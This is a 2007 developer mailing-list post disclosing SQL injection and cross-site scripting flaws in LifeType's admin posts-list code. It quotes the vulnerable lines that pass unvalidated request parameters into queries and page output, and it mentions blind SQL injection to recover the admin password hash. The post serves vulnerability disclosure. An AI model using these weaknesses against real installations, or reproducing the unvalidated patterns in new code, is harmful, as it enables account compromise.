[pLog-svn] [Lifetype] Multiple SQL Injections in Admin Posts List interfaces & a XSS vuln

Matt Wood matt at woodzy.com
Mon Jul 16 22:30:35 EDT 2007 

I was playing with the new ajax "build" earlier today and the new pretty YUI
components and found a couple problems with stuff unrelated & related to the
ajax stuff [which I noticed that most inputs were verified by oscar :), from
those plog-svn change-sets].

I've verified these attacks work but truthfully the only important cases
exist when you allow public registration for a blog through the lifetype
core (or have an untrusted user base), since in order to exploit these
vulnerabilities you must have a valid session.

There are many parameters passed into AdminPostsListView from
AdminEditPostsAction.class.php which are not validated and lead to SQL
injection attacks (recovering the admin's md5 password hash for example).

in the performAjax() and perform() methods
---
lifetype-1.3-ajax/class/action/admin/admineditpostsaction.class.php:

                  "showMonth" => $this->_request->getValue( "showMonth" ),
---
which is passed into the following, again unverified...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:
$thi
s->_showMonth = $this->_getParameter( $params, "showMonth",
$this->_locale->form
atDate( new Timestamp(), "%Y%m" ));
---
This leads to sql injection on almost all of the variables here... You can
easily verify this by checking the mysql logs and by looking at the query
string before its sent to the database. Since this injection is in the WHERE
clause where many bad things can occur. The most pervasive of which are
blindsql attacks on the password hashes.


These parameters are also echo'ed onto the web page unfiltered...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:

        $pager = new Pager(
"?op=editPosts&showMonth={$this->_showMonth}&amp
;showStatus={$this->_showStatus}&showCategory={$this->_showCategory}&sho
wUser={$this->_showUser}&searchTerms={$this->_searchTerms}&showLocation=
{$this->_locationId}&page="
---
leading to XSS with some clever parameters that require the pager to
actually display links.


On the severity...
The xss vuln not really that important... but even with a semi-trusted
userbase the sql injections could lead to the admin having his password
discovered.


-Matt
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://limedaley.com/pipermail/plog-svn/attachments/20070716/ec0347f1/attachment.htm

More information about the pLog-svn mailing list